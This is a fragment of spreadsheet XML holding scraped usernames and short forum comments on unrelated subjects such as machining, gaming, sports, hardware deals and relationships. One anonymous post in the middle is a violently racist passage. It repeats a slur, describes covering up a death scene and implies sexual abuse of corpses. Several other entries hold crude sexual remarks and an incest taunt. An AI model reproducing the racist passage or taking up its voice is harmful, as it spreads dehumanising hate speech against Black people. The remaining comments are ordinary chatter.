    <t>SimplePlenty</t>
  </si>
  <si>
    <t>Thanks, i have one more question: Im in my 3rd year of machining and I am already overwhelmed by the amount of different terms commonly tossed around by people on this subreddit and youtube. English isnt my first language but I am still learning names of some tools/parts In both English and Serbian. Will the names of different stuff in machining come by experience?</t>
  </si>
  <si>
    <t>gav1no0</t>
  </si>
  <si>
    <t>While doing my internship we were told to make the back end, make the API and then create the API documentation from which the front end team would take over. Is that the wrong order of operations according to you?</t>
  </si>
  <si>
    <t>TheSlowLorax</t>
  </si>
  <si>
    <t>Black would need to be niobium, because painted jewelry isn’t good for piercings. If you don’t like gold, consider switching out to a daintier clicker or something once you’re healed. The horseshoe isn’t for everyone.</t>
  </si>
  <si>
    <t>Cqouta</t>
  </si>
  <si>
    <t>Yes, that would be me.</t>
  </si>
  <si>
    <t>90WCaL</t>
  </si>
  <si>
    <t>And they have to go on the road against the #1 team</t>
  </si>
  <si>
    <t>IWantRaceCar</t>
  </si>
  <si>
    <t>I am 7'3 and anytime i see a non 7'3 center, its bbq chicken.</t>
  </si>
  <si>
    <t>ProfessorSarcastic</t>
  </si>
  <si>
    <t>A fair point, but then how do you decide which issues to have referenda for? What makes this particular issue worthy of a referendum, but not, say, going into Iraq etc?</t>
  </si>
  <si>
    <t>&gt;&gt;192673727 &gt;&gt;192672928 Nenchou is a Parasite with Kachou's memories latched on to Fuugetsu, and I would question if she is biologically identical. The Construct would also be just about as strong as the person it is latching on to. Souls Swap akin to Halkenburg and Kite might have been able to save Meruem's memories, I think. But Meruem would have been reduced to a mere mortal without a purpose. Not sure if he'd prefer that to death even if he thought about it. Sucking out the "poison" is nearly impossible when you realize that the "poison" is probably radiation destroying Meruem's cells. Angel's Breath is a regular fucking healing ability powered up by the Greed Island Master's Covenant. It shouldn't be able to heal Meruem at all if whoever created the ability was probably also unable to heal Gon. Nanika might have been able to heal him. But: 1) She is probably not Nen. Nen turns aura into a list of magical effects, all of which we know about. Nanika doesn't appear to consume Aura, and her rules make it seem like it is the wisher who is using the power 2) If she is Nen, she probably has more aura than Meruem, judging from her Teleport ability and the whole "kill hundreds of specific humans all over the world from her basement". 3) MIGHT is still just a possibility. We know that Nanika is bad at healing.</t>
  </si>
  <si>
    <t>haysanatar</t>
  </si>
  <si>
    <t>Two cool reads! The battle of Athens when a bunch of post ww2 GIs overthrew a corrupt racist sherrifs department. https://en.wikipedia.org/wiki/Battle_of_Athens_(1946) The other operation Mockingbird where the CIA worked on manipulating public oppinions by controlling journalists and major news broadcasters. https://en.wikipedia.org/wiki/Operation_Mockingbird</t>
  </si>
  <si>
    <t>what do we have here Johnson? another dead nigger in the alley case? holy fucking damn not again.... boys down at the station aren't gonna believe this *sigh* fuck it don't even let then know, just cover this scene up this time. I can't fucking deal with cases like this anymore every night I have dreams about these dead niggers.... don't I mean nightmares? no dreams. I've wanted this, I just didn't think it'd actually be a reality.. alright boys were gonna run a train on this here pile of dead niggers I want this to be a hush hush operation. nobody needs to know about this...</t>
  </si>
  <si>
    <t>SakhirM4</t>
  </si>
  <si>
    <t>Quote: Originally Posted by cjb762 Well, I mean at least for trump and clinton it's easy - they have none... Everyone has principles, but some may not be the same as yours. Whether that is good or bad depends on your principles.</t>
  </si>
  <si>
    <t>Acti-Arch_R-GREEDY</t>
  </si>
  <si>
    <t>The treasure vault camo has done that since release I reported it as soon as I unwrapped it and nothing has been done and it’s months ago now, it’s a disgrace the amount of problems I’ve had in this game and the things I’ve lost or not gotten after buying them or grinding for hours to them lose I lost 12 cases when the new operation started</t>
  </si>
  <si>
    <t>Groundpounder (invalid@example.com)</t>
  </si>
  <si>
    <t>Display name: Reasonable facsimile Any idea if the G3X with the EIS is an approved replacement for the primary engine instruments?</t>
  </si>
  <si>
    <t>RoastyMcRoasterson</t>
  </si>
  <si>
    <t>You could go as far as saying that your gardening skills have left you a little red faced.</t>
  </si>
  <si>
    <t>cheesecomesfromfish</t>
  </si>
  <si>
    <t>How to curator if you don’t roll antag: watch YouTube</t>
  </si>
  <si>
    <t>Lord_Titan_</t>
  </si>
  <si>
    <t>Thanos is stronger but too slow to match Clark. Although I don't see this as a stomp, Clark edges him out in versatility, hed get wrecked in h2h, he was losing to batman stats equalised</t>
  </si>
  <si>
    <t>Operation_Spirit</t>
  </si>
  <si>
    <t>Even if you have PIED the pills will have an effect an might help a lot even. The thing with PIED is that the problem is in the brain, so cutting out porn and masturbation will be the key, but the pills will surely help with the physical part and with anxiety, it helped me at least.</t>
  </si>
  <si>
    <t>mechathatcher</t>
  </si>
  <si>
    <t>I don't regret buying anything. Everything I've bought has been well thought through. It's just like a 12 thousand pound watch. I love watches, but a £12k watch is for someone who is a millionaire. Not someone who just has a reasonable income.</t>
  </si>
  <si>
    <t>Boychaves</t>
  </si>
  <si>
    <t>The new exchange set 3 87-88s for 1 89-90 OVR</t>
  </si>
  <si>
    <t>Sertith</t>
  </si>
  <si>
    <t>Activated ores like that happen on stormy planets. Just build your base so you don't have to go outside to do stuff. Or find a nice weather planet and just don't make AS much money. You don't really need 294082349083294 billion units every hour.</t>
  </si>
  <si>
    <t>KingConq</t>
  </si>
  <si>
    <t>I was waiting for someone to mention me.</t>
  </si>
  <si>
    <t>scimjim</t>
  </si>
  <si>
    <t>A domino Pimlico (mini based kit) in the foreground - I built one of those many years ago! 552D6CFF-4A45-4E3D-895C-33DFD40E086D.jpeg (293.55 KiB) Viewed 65 times Jim King SECURE DRY STORAGE FOR YOUR SCIMITAR Current: SE5 ( 8Ball ), TI SS1 ( snotty ), 1600 SS1 ( G97 ), 1600 SS1 ( C686CCR ), 2.5TD SE5a ( diesel 5a ), 6 x random other SS1s. Previous: SE5, 3 x SE5a, 2 x SE6a, 3 x SE6b, GTC, 2.9i GTC, 3 x 1600 SS1, 1300 SS1, Mk1 Ti Sabre, Mk1.5 CVH Sabre Chief mechanic for: 1400 K series SS1 ( Megan3 ), 1400 CVH EFi SS1 ( Grawpy ), 1300 SS1 ( Number One ) &amp; Sarah's coupe . CURE THE FAULT - NOT THE SYMPTOMS Top</t>
  </si>
  <si>
    <t>linandy1</t>
  </si>
  <si>
    <t>Shirley conversion taking place will give a heads-up on waterpark settlement??? All nicely engineered here I will say with price ...stinks to be honest</t>
  </si>
  <si>
    <t>Pastelitomaracucho</t>
  </si>
  <si>
    <t>Good for you, man. I am also extremely put off by women like that. I don't blame them, they will get sex 90% of the time by being forward and agressive, as most men won't say no to some quick ass.</t>
  </si>
  <si>
    <t>Crusadeer</t>
  </si>
  <si>
    <t>There are areas where it’s better to buy , and there are areas where it’s better to rent.\u003Cbr\u002F\u003E\u003Cbr\u002F\u003EAlso, buying for living yourself is always something which is done for larger space etc. (not purely for “numbers”)</t>
  </si>
  <si>
    <t>smallpeen51</t>
  </si>
  <si>
    <t>You need to use a lot more weight before you can have a girlfriend</t>
  </si>
  <si>
    <t>Dick_Twistie</t>
  </si>
  <si>
    <t>It's courtesy in some social circles not to expose the inside of your mouth, especially for women. Same goes for yawning, laughing or even eating. Being shocked is basically a *brain fart* state, in which a person has to take time to evaluate the situation, and might forget his/her mouth open. In this case, covering the mouth is almost a reflex.</t>
  </si>
  <si>
    <t>CrazyGamer313</t>
  </si>
  <si>
    <t>Hello 911 whats your emergency?</t>
  </si>
  <si>
    <t>LowSerotoninLevel</t>
  </si>
  <si>
    <t>Accidents don't exist in the eyes of the courts. Accident implies no fault. Collisions only.</t>
  </si>
  <si>
    <t>baroldo12345</t>
  </si>
  <si>
    <t>Street Fighter V knows how to bring the tits</t>
  </si>
  <si>
    <t>playingsssspvp</t>
  </si>
  <si>
    <t>[HWYA] does anyone know a good way to push to champions as a th9</t>
  </si>
  <si>
    <t>Finn_Finite</t>
  </si>
  <si>
    <t>Look up "she divorced me because I left my dishes by the sink". Have him read it. If that doesn't cause an epiphany, to marital counseling with you.</t>
  </si>
  <si>
    <t>ScottTargetTestPrep</t>
  </si>
  <si>
    <t>Most self-study courses have question banks. Would you consider using a self-study course?</t>
  </si>
  <si>
    <t>Alfred-Bitchcock</t>
  </si>
  <si>
    <t>I can't help but feel hopeless about countering the multi-generational subsidization of car-related infrastructure. I've read that many people think the chief destroyer of American communities is the car and how we've designed these huge suburban swathes of low-density residential homes around them. Is it even feasible to redevelop entire suburban tracts into places that prioritize the pedestrian over the car? Has it been done?</t>
  </si>
  <si>
    <t>&gt;&gt;7814596 Did you fap to your sisters or not? ANSWER THE DAMN QUESTION ANON</t>
  </si>
  <si>
    <t>SinisterSiamese</t>
  </si>
  <si>
    <t>Hi everyone! I'm trying to find some good resources on how to approach drawing backgrounds for games as I'm not very good at it. I'm somewhat decent at doing more detailed objects and characters but find the bigger pieces a lot harder. Anything from tutorials to general pointers regarding color selection, scale, contrast etc or just good reference art would be extremely helpful. Thanks!</t>
  </si>
  <si>
    <t>Angel72421</t>
  </si>
  <si>
    <t>I have one more day! Please please any help! I promise to pay it forward! I know God's blessings are always meant to be paid forward! Thank you!!</t>
  </si>
  <si>
    <t>BirkiLady</t>
  </si>
  <si>
    <t>@beach-mom I used to use Viet Nam Veterans a lot. However, in December they suddenly stopped sending the yellow bags and their phone numbers were disconnected! After a lot of research, I found out VNV is not longer available in most states. It seems for the jobs have been eliminated "Because the Viet Nam Vets have all reached retirement age and no longer are available to work." Since the draft is no longer in place, I wonder if that pertains to DAV also? I haven't seen a DAV truck this year either. Yet, our communities will always have enlisted veterans with disabilities and the need for employment opportunities for them. Great question!</t>
  </si>
  <si>
    <t>TL;DR There’s a little bit of cancer in literally every thread on this board. Wow. Who knew.</t>
  </si>
  <si>
    <t>incoherent1</t>
  </si>
  <si>
    <t>Do you have any out fans or are they all in? Your top fan doesn't appear to be working.</t>
  </si>
  <si>
    <t>Muzeah</t>
  </si>
  <si>
    <t>Don't worry as long as you have a good understanding at GCSE you should be able to pick up the concepts at uni level imo with hard work</t>
  </si>
  <si>
    <t>phil w</t>
  </si>
  <si>
    <t>Quote: from: ElyDave on Yesterday at 08:09:19 pm icing a very sore ankle, due to a tractor pulling out on me and then squeezing me into a kerb. Rear wheel of the trailer clipped my leg causing friction burns and a twisted ankle. Road rash on right hand as well. Did they stop?</t>
  </si>
  <si>
    <t>Mackin-N-Cheese</t>
  </si>
  <si>
    <t>Your post has been removed because you're trying to find something like a brand name, where to purchase, or even just find 'more information' on something you've already identified. Try r/helpmefind.</t>
  </si>
  <si>
    <t>FaxenIsHip</t>
  </si>
  <si>
    <t>Oi let me just throw a yellow halo on this ferrari lmao</t>
  </si>
  <si>
    <t>It may depend on the level of position. The higher level, the more yes needed. I guess but hope it is not true.</t>
  </si>
  <si>
    <t>ncjb-</t>
  </si>
  <si>
    <t>This might actually tip me over and make me stay in London. At least in the context of my mental health. Thanks. Why? It is bloody draining already. People maybe just being insensitive but every single person except the person on the gates in the whole building already have mentioned to me that the outgoing person was loud, raucous in a good way and lovely. I don’t know what to do with that information.</t>
  </si>
  <si>
    <t>caseyweederman</t>
  </si>
  <si>
    <t>Hey Krak. I'm right there with you.</t>
  </si>
  <si>
    <t>rachelxoh</t>
  </si>
  <si>
    <t>You’re getting catfished, my dude. What are the odds a random person meets you on a game and coincidentally is moving to the same country you live in?? Especially since it seems she didn’t add you because of where you live but only asked after she added you. This is silly and honestly sounds like teenager shit.</t>
  </si>
  <si>
    <t>RodSerling22</t>
  </si>
  <si>
    <t>And angry she took six years of my life away.</t>
  </si>
  <si>
    <t>numberfivedream</t>
  </si>
  <si>
    <t>The Earrings of Madame de</t>
  </si>
  <si>
    <t>&gt;&gt;13894844 Yeah this is just a semantic argument to weasel out of dealing with the issue.</t>
  </si>
  <si>
    <t>protogenxl</t>
  </si>
  <si>
    <t>Both WD and Seagate Have "Surveillance drives" but that is probably best left for down the road when using 4k. For now my picks would be an older model drives like this https://pcpartpicker.com/product/jc8Zxr/western-digital-internal-hard-drive-wd3000fyyz or https://pcpartpicker.com/product/gwBv6h/seagate-internal-hard-drive-st3000dm001</t>
  </si>
  <si>
    <t>Starting5B</t>
  </si>
  <si>
    <t>Your point is well taken but Lebron didn’t break stride and that to me is why the pass is so pinpoint and deserves at least 50% of the credit</t>
  </si>
  <si>
    <t>gaberax</t>
  </si>
  <si>
    <t>That was a great series. Never got or cared much for Cohens humor. But he really carried the show. Bravo.</t>
  </si>
  <si>
    <t>dzcFrench</t>
  </si>
  <si>
    <t>Have you tried wolf urine?</t>
  </si>
  <si>
    <t>just_double_v</t>
  </si>
  <si>
    <t>Both are backups and potential sleepers at PG position. I'm more interested in their possible production. How do you think are hashtag projections accurate in their case? Role and ability to get those numbers. Morris - 24 MIN, 1.2 3PT 11PTS 4AST 1STL 0.6TO Tyrus Jones 24MIN 8PTS 5AST 2.1 REB 1.3STL 0.7TO</t>
  </si>
  <si>
    <t>zoeey123</t>
  </si>
  <si>
    <t>Thanks for the info. Great to know as I'm considering getting a teaching cert as a starting point in the industry.</t>
  </si>
  <si>
    <t>mfischer1</t>
  </si>
  <si>
    <t>Smoltz and Frenchie are fantastic.</t>
  </si>
  <si>
    <t>Lookingfordrink</t>
  </si>
  <si>
    <t>How do you do it? Seriously do you not live?</t>
  </si>
  <si>
    <t>MarcSenTM</t>
  </si>
  <si>
    <t>Why kill yourself? Why end the one thing that can make you feel any better, or anything at all? Also, do you feel you have tried everything to make the depression go away? Does it make you feel atleast somewhat better to know that suicidal depression often comes and goes? It just take time and effort Hope you feel better and choose a different route</t>
  </si>
  <si>
    <t>orangeburger</t>
  </si>
  <si>
    <t>with the hygienist you will likely have your teeth cleaned as well.</t>
  </si>
  <si>
    <t>BuccoFan8</t>
  </si>
  <si>
    <t>I’d also be interested in a few games. Let me know what you decide to do.</t>
  </si>
  <si>
    <t>dogszcats</t>
  </si>
  <si>
    <t>These 20 known Foods are dangerous for your dog and Can Kill him !</t>
  </si>
  <si>
    <t>momax_powers</t>
  </si>
  <si>
    <t>[Matrexx 30 - **$39.99**](https://www.canadacomputers.com/product_info.php?cPath=6_113&amp;item_id=136034) [Matrexx 50 - **$54.99**](https://www.canadacomputers.com/product_info.php?cPath=6_113&amp;item_id=138713) [Matrexx 50 w/4x120mm aRGB fans - **$79.99**](https://www.canadacomputers.com/product_info.php?cPath=6_112&amp;item_id=139452) **BEST DEAL IN MY OPINION** [Matrexx 55 w/front rgb strip - **$59.99**](https://www.canadacomputers.com/product_info.php?cPath=6_112&amp;item_id=123888) [Matrexx 55 White aRGB front strip &amp; shroud - **$69.99**](https://www.canadacomputers.com/product_info.php?cPath=6_112&amp;item_id=133893) [Matrexx 55 w/3x120mm aRGB fans/strip - **$89.99**](https://www.canadacomputers.com/product_info.php?cPath=6_112&amp;item_id=129670) [Matrexx 70 w/3x120mm aRGB shroud &amp; fans - **$109.99**](https://www.canadacomputers.com/product_info.php?cPath=6&amp;item_id=137008) (Regularly goes on sale for 99.99</t>
  </si>
  <si>
    <t>H-otter</t>
  </si>
  <si>
    <t>spatter 16/09/2019 07:55 ALL figs have dead wasps in them. Fact for the day... Strange, but true Hot too</t>
  </si>
  <si>
    <t>puppy26846</t>
  </si>
  <si>
    <t>What happened to the OG laces on the 750s?</t>
  </si>
  <si>
    <t>Rum_Hamtaro</t>
  </si>
  <si>
    <t>I love the addition of the completely unnecessary TLDR.</t>
  </si>
  <si>
    <t>calumplays</t>
  </si>
  <si>
    <t>My chat messed up and idk how to fix Please help me! Image link: https://prnt.sc/p1yqtp</t>
  </si>
  <si>
    <t>coolhipo</t>
  </si>
  <si>
    <t>Its CWL. Lvls and THs dont metter. You get matched with other clans in the same league. Thats why in masters+ without atleast 80% of your clan being th12s you are screwed</t>
  </si>
  <si>
    <t>briantheunfazed</t>
  </si>
  <si>
    <t>I would watch the hell out of that. I don’t know how he’s single.</t>
  </si>
  <si>
    <t>PompousRooster</t>
  </si>
  <si>
    <t>To add to how it went I recalled something. After administering the dose, she sat on the toilet waiting for the water works. I go and sit on the coach. 5’minuted or silence followed by screaming from the bathroom.....”ITS WORKING ITS WORKING”</t>
  </si>
  <si>
    <t>mandarox222r</t>
  </si>
  <si>
    <t>Do any blue buses go to the Binghamton DMV?</t>
  </si>
  <si>
    <t>ReturnToFlesh84</t>
  </si>
  <si>
    <t>One of these days people will stop making this joke for *every* release that happens.</t>
  </si>
  <si>
    <t>solar-cabin</t>
  </si>
  <si>
    <t>No thanks!</t>
  </si>
  <si>
    <t>Mobe-E-Duck</t>
  </si>
  <si>
    <t>What a bizarre question. I was just explaining how /u/defiantcross seems to think that only the rich can afford sea travel when it's literally - even in the last few years - been accomplished with home built vessels. Now we have the technology to build extremely effective ships for very little money but his argument was 'if only everyone had access to million dollar yachts'. How silly. I mean, if only everybody had access to sixty-million dollar aircraft... oh wait! WE DO. To address your silly straw man: No. I'm a pilot. I want all shipping to be done via 747 and a380. Of course, nobody mentioned shipping here but that's the nature of a red herring isn't it? Try to distract from the real argument to divert things to an argument you think you can win. Naturally, you can't win it and here's why: the vast majority of shipping is already done by sea and [the newer technology is greener](https://theweek.com/articles/825647/why-cargo-ships-might-literally-sail-high-seas-again). And that is just for shipping, carrying millions upon millions of tons of cargo across an ocean. This same tech, scaled down, could transport people quite easily and eliminate even more fossil fuel from the equation. Hell, make it electric and solar or regenerative via counter-turbine and the ship could sale itself fossil-free. And before you argue something stupid about how electric ships can work, old fashioned WW2 submarines could run electric. Seriously - try to learn, bud.</t>
  </si>
  <si>
    <t>lopete89</t>
  </si>
  <si>
    <t>Why don’t you buy the year and find someone else to take the pass after? You can change the assigned license plates on the parking portal, i think, and get half your money back next semester?</t>
  </si>
  <si>
    <t>obsidian395</t>
  </si>
  <si>
    <t>Roller skating!? Sounds like an awesome birthday to me. That's what I did last year and will probably do it again this year.</t>
  </si>
  <si>
    <t>HarryShachar</t>
  </si>
  <si>
    <t>Where can I learn this power?</t>
  </si>
  <si>
    <t>bitbanana</t>
  </si>
  <si>
    <t>This makes it very worth it to me.</t>
  </si>
  <si>
    <t>dreamersrevenge</t>
  </si>
  <si>
    <t>Do you believe in “vibes” and “energy”? Why or why not?</t>
  </si>
  <si>
    <t>jeangreyforever</t>
  </si>
  <si>
    <t>TheDutchman said: ↑ I wonder how closely Lucas worked with him. I have a feeling it was very little. I'll also bet that the things that take the most heat in TROS, months or years down the road JJ will subtly imply that those ideas came from GL. Click to expand... Everyone's been comparing what we know of TROS so far with Dark Empire and it's often been said that Lucas was a huge fan of Dark Empire and gave it attention in a way he never did with pretty much the rest of the EU. Not to mention that TROS seems to be heavily based on old treatments of TFA and ROTJ, both of which Lucas was involved with. Don't JJ and Lucas have a really good working relationship, if not personal friendship? I can't see JJ throwing him under the bus.</t>
  </si>
  <si>
    <t>Throwawayuser626</t>
  </si>
  <si>
    <t>I have a friend with bipolar type 2 and possible NPD, who is better now and gets help for herself. But there was a time she didn’t take her meds or seek therapy and she admitted to me that she purposefully started fights because the drama was fun, and she was bored.</t>
  </si>
  <si>
    <t>EstaVS</t>
  </si>
  <si>
    <t>There used to be a badly maintained billboard on the M25 near Heathrow but that’s literally all I’ve even seen of it. I started to believe I’d made it up cus no one I know has heard of it.</t>
  </si>
  <si>
    <t>Necroqubus</t>
  </si>
  <si>
    <t>Uruka best girl proved with FACTS and LOGIC. MC should wife her asap</t>
  </si>
  <si>
    <t>pM-me_your_Triggers</t>
  </si>
  <si>
    <t>They had 3 ten win seasons after RGIII left. It was the sex scandal and getting a punishment almost as bad as the death penalty that killed them</t>
  </si>
  <si>
    <t>ItsHoniB</t>
  </si>
  <si>
    <t>that was an attack i didn’t sign up for</t>
  </si>
  <si>
    <t>wipny</t>
  </si>
  <si>
    <t>Are there cheats available for the mobile version of GTA 3? I'm currently playing the iOS version.</t>
  </si>
  <si>
    <t>ops-name-checks-out</t>
  </si>
  <si>
    <t>Ok, well they probably shouldn’t have done that, BUT, being on the emergency contact list makes it probable that this is more of an administrative rather than legal issue. I would call the school and setup a meeting with the principal to explain the issue. Be prepared to show them court orders demonstrating that your ex has no right to pick up the kid, etc... most schools are more than happy to help if they understand the issues.</t>
  </si>
  <si>
    <t>&gt;&gt;265550230 Yes but only a certain few can use it without needing all seven emeralds. Sonic, Silver, and maybe Knuckles need at least one emerald. Shadow and Neo Metal don't need one at all.</t>
  </si>
  <si>
    <t>Atheunknown35</t>
  </si>
  <si>
    <t>In France the words for hot and cold start with a c and an h respectively so the colors are flipped. This helps me anytime I see it.</t>
  </si>
  <si>
    <t>ShamanBag</t>
  </si>
  <si>
    <t>Quote: : PsilocyBen17 said: how do you prep your oats dawg? how long do you PC? I follow the easy AF tek. So I boil them until just a few are burst. Then I strain and let cool before loading jars and pressure cooking for 2 hours 1t 15-18psi. Quote: :</t>
  </si>
  <si>
    <t>Heaney555</t>
  </si>
  <si>
    <t>Cosmos is nto a standalone headset, and adding the wireless adapter would make it more expensive than even Index.</t>
  </si>
  <si>
    <t>PurplePetal04</t>
  </si>
  <si>
    <t>She is so beautiful to me and looks great in a hijab. I know they’re not worn as a fashion statement but she really does make them look so fashionable.</t>
  </si>
  <si>
    <t>ang0205</t>
  </si>
  <si>
    <t>yes same here and completely normal. this was one of the first things I noticed even before I took a test this and indigestion and I said to myself yeah hope this means I'm pregnant and a few days later yup I am.</t>
  </si>
  <si>
    <t>HookedOnCthonics</t>
  </si>
  <si>
    <t>It's likely to be used as precedent for further returns.</t>
  </si>
  <si>
    <t>deadshittydoves</t>
  </si>
  <si>
    <t>i think that's just hair from the back of her head pulled forwards over her shoulder.. also it's darker because it's most likely a chunk of hair that's under a couple of layers uk? not as exposed to the sun so not as naturally light</t>
  </si>
  <si>
    <t>IrishJax57</t>
  </si>
  <si>
    <t>I think you should build a mountain behind it that it’s almost coming out of, and also think you should make to different files that way if you like the original better to still have it.</t>
  </si>
  <si>
    <t>Rufs</t>
  </si>
  <si>
    <t>Posted on 01/09/2019 17:22 by EasyT If you search hard enough for problems Ruff you will find them. not searching, anticipating</t>
  </si>
  <si>
    <t>JasonYaya</t>
  </si>
  <si>
    <t>I don't like the Cards either but that's a little much.</t>
  </si>
  <si>
    <t>MittenstheGlove</t>
  </si>
  <si>
    <t>Absolutely. I’m so tired of working in general. Like I remember being so bright eyed and bushy tailed and now I’m devoid of anything related to energy. I am a ball of depression that can’t be bothered to spend time on anything worth anything because I spend time being exhausted at work.</t>
  </si>
  <si>
    <t>Wayne Iles</t>
  </si>
  <si>
    <t>Lenovo Yoga Tab 3 (16GB, Wi-Fi, 8 inch, Black Tablet) 32Gb Micro SD. Condition is Used. Sent with Australia Post Pre-Paid Parcel Post Satchel 3kg. The tablet comes with a 8.00-inch display with a resolution of 1280x800 pixels. Lenovo Yoga Tab 3 (8-inch) is powered by a 1.3GHz quad-core Qualcomm Snapdragon 210 processor. It comes with 2GB of RAM. The Lenovo Yoga Tab 3 (8-inch) runs Android 5.1 and is powered by a 6,200mAh non-removable battery. Extended JB-HIFI warranty until 08/01/2020 - Transferrable</t>
  </si>
  <si>
    <t>Siltyn</t>
  </si>
  <si>
    <t>I only watched the first season and while I found the main guy almost insufferable to watch, thought it was a good show. Told my girlfriend I thought it would be a good season to watch and discuss with her soon to be high school aged sons to show them how not to act towards others. I went to high school more than 30 years ago, yet it still pretty much nailed what I saw go on in high school.</t>
  </si>
  <si>
    <t>TellingChaos</t>
  </si>
  <si>
    <t>This is the 1st time in 2 years that I run out of training Items, Parunga where you at buddy? We need your help.</t>
  </si>
  <si>
    <t>Soft_Tourist</t>
  </si>
  <si>
    <t>Recency bias makes it impossible for me to decide, since it is easier to watch KDB being nuts right now. But Özil was insane, especially since the system was build around him distributing in transition in one of the best counter attacking teams in history. But KDB is also just such a joy to watch. The guy can be the difference between a frustrating 1-0 and a 5-0 for City. Without considering form KDB is arguably the best player in the league.</t>
  </si>
  <si>
    <t>Foslagon</t>
  </si>
  <si>
    <t>I use a wireless 360 controller with an adapter for my PC gaming and the thing is a battery eating machine. So my question is first, if I buy a charging cable, could I play with my controller even with dead batteries? Second, can anyone recommend a good wire that won't break the bank?</t>
  </si>
  <si>
    <t>ihedenius</t>
  </si>
  <si>
    <t>&gt;Description &gt;SHARE MY STORY is a platform that allows teenagers to have their stories animated and shared around the world. &gt;Send your story to sharemystory2019@gmail.com</t>
  </si>
  <si>
    <t>minneapolis_boii</t>
  </si>
  <si>
    <t>Berrios needs an extended rest. He needs a couple weeks to think and collect himself before the post season</t>
  </si>
  <si>
    <t>-SNST-</t>
  </si>
  <si>
    <t>&gt;I don't want to tho. I want to play it. It's legit better than SR. ???ok?? It's not like they will keep it because you can't deal with it lol. The post contains the exact reason why it wasn't here to stay, if you haven't checked it &gt;I liked Dominion and TT too but, comparatively, they are garbo compared to NB. That's like, your opinion dude &gt;NB was a fun little addition that wouldn't exactly cost Riot much in any way. Seems you're talking shit out of your ass, you have absolutely no idea about the behind the scenes to maintain additional content and the costs of it. Money doesn't grow on trees...</t>
  </si>
  <si>
    <t>karmacarmelon</t>
  </si>
  <si>
    <t>And you'd have a criminal record which would make it far harder to get a job when you come out.</t>
  </si>
  <si>
    <t>autotldr</t>
  </si>
  <si>
    <t>This is the best tl;dr I could make, [original](https://www.newsweek.com/north-korea-boat-attack-russia-clash-1459737) reduced by 63%. (I'm a bot) ***** &gt; A North Korean vessel attacked a Russian border police ship in what was the latest dramatic standoff along the tense, sometimes disputed borders of Northeast Asia. &gt; In a statement sent Tuesday to the state-run Tass Russian News Agency, Russia's Federal Security Service said that the "Crew of a North Korean vessel carried out an armed attack on the members of a monitoring group of the border guards' ship" in the Sea of Japan, known to the Koreas as the East Sea. &gt; Russian border guards then reportedly detained the attacking ship, as well as another North Korea ship and 11 motorboats, accusing them of poaching within Russia's exclusive economic zone. &gt; North Korea and Russia have been involved in a number of clashes involving border guards and fishing vessels, including a deadly 2016 incident that saw the FSB open fire on North Koreans allegedly entering Russian waters in the Sea of Japan, but disputes were not limited to these two countries who traditionally enjoy cordial relations. &gt; As reports emerged Tuesday of the latest clash involving North Korea and Russia, the official Korean Central News Agency cited a North Korean Foreign Ministry spokesperson who defended his country's actions. &gt; In January, Japan's coast guard detained two suspected North Korean fishermen off the country's northern coast and in June it said that it had forced more than 300 North Korean boats out of Japan's exclusive economic zone in less than a month's time, sometimes using water cannons. ***** [**Summary Source**](https://smmry.com/https://www.newsweek.com/north-korea-boat-attack-russia-clash-1459737) | [FAQ](http://autotldr.io/ "399603 summaries so far.") | [Feedback](http://www.reddit.com/message/compose?to=%23autotldr "PM's and comments are monitored, constructive feedback is welcome.") | *Top* *keywords*: **North**^#1 **Korea**^#2 **Korean**^#3 **Japan**^#4 **Russian**^#5 Post found in [/r/worldnews](http://np.reddit.com/r/worldnews/comments/d5k7af/north_korean_boat_attacks_russian_ship_in_the/). *NOTICE*: This thread is for discussing the submission topic. Please do not discuss the concept of the [autotldr](http://www.reddit.com/user/autotldr) bot here.</t>
  </si>
  <si>
    <t>flavionm</t>
  </si>
  <si>
    <t>Buying the Battle Pass and some levels every year surpasses the amount of support that Dota+ gives. Just because someone wants to support Dota doesn't mean they need Dota+. Also, Dota+ puts features that should be free behind a paywall, so fuck that.</t>
  </si>
  <si>
    <t>SubcommanderMarcos</t>
  </si>
  <si>
    <t>&gt; There's a speed limit for a reason. Yes there is, robbing the population with no concern for their safety. How can people be this gullible.</t>
  </si>
  <si>
    <t>veritased</t>
  </si>
  <si>
    <t>I think this Ranger idea is a dangerous one. Either you have some force of law, are sworn in, or you aren't. If you aren't, no matter what uniform I'm given, I ain't coming up to anyone and telling them what they can and cannot do legally.</t>
  </si>
  <si>
    <t>AidsPatientzero_01</t>
  </si>
  <si>
    <t>Hey bro, don't be making assumptions. They didn't tell us WHY it was closed they, just said it was closed.</t>
  </si>
  <si>
    <t>comat0se</t>
  </si>
  <si>
    <t>\*Zoology student</t>
  </si>
  <si>
    <t>Tiernan1980</t>
  </si>
  <si>
    <t>I have an older copy of a synth librarian/editor program, but it’s for the PowerPC architecture. If I buy Snow Leopard, can I run it in a VM and use Rosetta, or should I just buy Tiger and a cheap PowerPC Mac?</t>
  </si>
  <si>
    <t>sukhoi35</t>
  </si>
  <si>
    <t>The whole area is 10 times the size of Singapore. Without money its just a dream</t>
  </si>
  <si>
    <t>GoldenKaos</t>
  </si>
  <si>
    <t>Is it just mediocre or is it off to a slow start? Probably should be working.</t>
  </si>
  <si>
    <t>jnads</t>
  </si>
  <si>
    <t>Technically Gen Z If you were a fan of Green Day you're a millennial.</t>
  </si>
  <si>
    <t>PugHugger</t>
  </si>
  <si>
    <t>I don't think I am of much assistance to you Gola - I've never booked a resort with a private pool as frankly my budget does not generally allow for that! However I have briefly considered Coco Bodu Hithi and Hurawalhi both of which have private pools in some or all of the rooms. Your problem will be your budget. which is about $8.8k USD for eleven nights in high season. To get a private pool at the most expensive time of the year might be difficult. I would contact some of the agents with your wish list and see if they have suggestions.</t>
  </si>
  <si>
    <t>nnjb52</t>
  </si>
  <si>
    <t>Pretty, but it’s a $1200 slippery brick of fragile glass that costs a ton to repair and replace....so it’s going right into a case.</t>
  </si>
  <si>
    <t>reala_stemert</t>
  </si>
  <si>
    <t>Ive never seen it does it only talk about jw or others to?</t>
  </si>
  <si>
    <t>SFBushPig</t>
  </si>
  <si>
    <t>“Horses on the back Horse tack is attached Hat is Matt black Cowboy hat from Gucci Wrangler on my booty</t>
  </si>
  <si>
    <t>Fortythreeandfatasfuck</t>
  </si>
  <si>
    <t>Well done mrd I'm struggling a bit, already on 458 but super hungry, I might have to make it a 700cal fd today. The urge to sack it all in and pour a glass of wine is strong but hopefully I can stay on course.... send positive thoughts</t>
  </si>
  <si>
    <t>AIreadyDid</t>
  </si>
  <si>
    <t>Wow! Great fan art! Keep up the good work, you have a lot of talent, I can tell, I love it when people put so much effort into their art and share it with other people!</t>
  </si>
  <si>
    <t>ArthurMorgan8888</t>
